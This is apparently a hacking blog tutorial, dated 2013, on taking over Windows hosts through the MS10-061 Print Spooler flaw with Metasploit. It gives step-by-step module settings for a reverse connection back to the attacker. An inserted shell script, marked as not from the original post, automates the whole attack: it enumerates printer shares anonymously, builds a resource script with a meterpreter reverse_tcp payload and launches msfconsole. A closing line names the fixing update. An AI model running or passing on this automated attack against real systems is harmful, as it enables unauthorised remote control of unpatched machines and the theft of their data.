Friday, December 6, 2013

Hacking Windows via MS10-061 Print Spooler Service Impersonation using Metasploit + Backtrack 5

Have you ever seen someone share a printer on a network? In an office you probably see it every day: a printer is connected to one computer, and that computer acts as the print server. This vulnerability is not about the print server itself, though, but about the service behind printer sharing in Windows, the Print Spooler. In this tutorial we will try to hack Windows through that printer sharing service.
This is the description of the exploit according to the Metasploit website:
This module exploits the RPC service impersonation vulnerability detailed in Microsoft Bulletin MS10-061. By making a specific DCE RPC request to the StartDocPrinter procedure, an attacker can impersonate the Printer Spooler service to create a file. The working directory at the time is %SystemRoot%\system32. An attacker can specify any file name, including directory traversal or full paths. By sending WritePrinter requests, an attacker can fully control the content of the created file. In order to gain code execution, this module writes to a directory used by Windows Management Instrumentation (WMI) to deploy applications. This directory (Wbem\Mof) is periodically scanned and any new .mof files are processed automatically. This is the same technique employed by the Stuxnet code found in the wild.
You will probably get impatient if I write too much intro :-P so let's start the tutorial.

Requirement :

1. Metasploit framework

Step by Step :

1. First, explore your network locations and find the printer shares on your network. The picture below shows the active printer share I found in my network.
2. Yep, we've got one victim there. Now prepare the Metasploit console by typing the msfconsole command, then use the ms10_061 exploit (exploit/windows/smb/ms10_061_spoolss) and set up the payload.
3. To view the available options, use the show options command. The picture below shows the option values I used to perform the attack.
Information:
set pname canon --> the name of the printer share (see step 1)
set rhost 192.168.8.94 --> IP address of the host that shares the printer
set lhost 192.168.8.92 --> the attacker's local address (use ifconfig to view your IP)
set lport 443 --> connect-back port from the victim to our computer
4. Okay, up to this step everything has been set up nicely and we are ready to attack the victim. Run the exploit command to perform the attack and see whether we can pwn it or not.
5. Yep, everything ran so smoothly, and here is the final result after waiting for the session:
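Steps 1 to 4 scripted end to end, as an added example that is not code from the original post or from the Metasploit project. It assumes the printer share is enumerated with Samba's rpcclient (whose output lists each printer on a name:[\\host\share] line; the sample below is constructed, not captured from a real target), and it assumes the payload windows/meterpreter/reverse_tcp, which the post does not name although it configures a connect-back port. The addresses and the share name are the ones from the write-up.

```shell
#!/bin/sh
# Added example, not code from the original post: turn the manual
# msfconsole session (steps 2-4) into a Metasploit resource script and
# feed it the share name found in step 1.
# Assumptions not stated on the page: rpcclient is used for enumeration
# and the payload is windows/meterpreter/reverse_tcp.
set -eu

# Read `rpcclient -c enumprinters` output on stdin and print the first
# printer share name (the part after the last backslash of name:[...]).
printer_share_from_enumprinters() {
    sed -n 's/^[[:space:]]*name:\[\(.*\)]$/\1/p' \
      | sed 's/.*\\//' \
      | head -n 1
}

# Constructed sample of rpcclient output for the host in the write-up.
sample_enumprinters() {
    printf '%s\n' \
      '	flags:[0x800000]' \
      '	name:[\\192.168.8.94\canon]' \
      '	description:[\\192.168.8.94\canon,Canon printer,]' \
      '	comment:[]'
}

# Emit the resource-script equivalent of steps 2-4.
# Usage: build_rc PNAME RHOST LHOST LPORT
build_rc() {
    pname=$1 rhost=$2 lhost=$3 lport=$4
    cat <<EOF
use exploit/windows/smb/ms10_061_spoolss
set PNAME $pname
set RHOST $rhost
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $lhost
set LPORT $lport
exploit
EOF
}

# Live run: enumerate the share anonymously, build the script, launch it.
# Usage: ./ms10_061.sh RHOST LHOST [LPORT]
run_attack() {
    rhost=$1 lhost=$2 lport=${3:-443}
    pname=$(rpcclient -N -U '' "$rhost" -c enumprinters \
              | printer_share_from_enumprinters)
    if [ -z "$pname" ]; then
        echo "no printer share found on $rhost" >&2
        return 1
    fi
    rc=$(mktemp)
    build_rc "$pname" "$rhost" "$lhost" "$lport" > "$rc"
    msfconsole -q -r "$rc"
}

# Only attack when a target and a listener address are given, so that
# sourcing the file (or running it with no arguments) is harmless.
if [ $# -ge 2 ]; then
    run_attack "$@"
fi
```

Running `./ms10_061.sh 192.168.8.94 192.168.8.92` reproduces the console session from the screenshots; the share name is no longer typed by hand, which is the step most often got wrong, since PNAME must match the share exactly as the spooler exports it.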
We owned the machine :-P

A target that falls to this module is missing the fix from Microsoft Security Bulletin MS10-061 (KB2347290, released in September 2010); installing that update closes the hole.
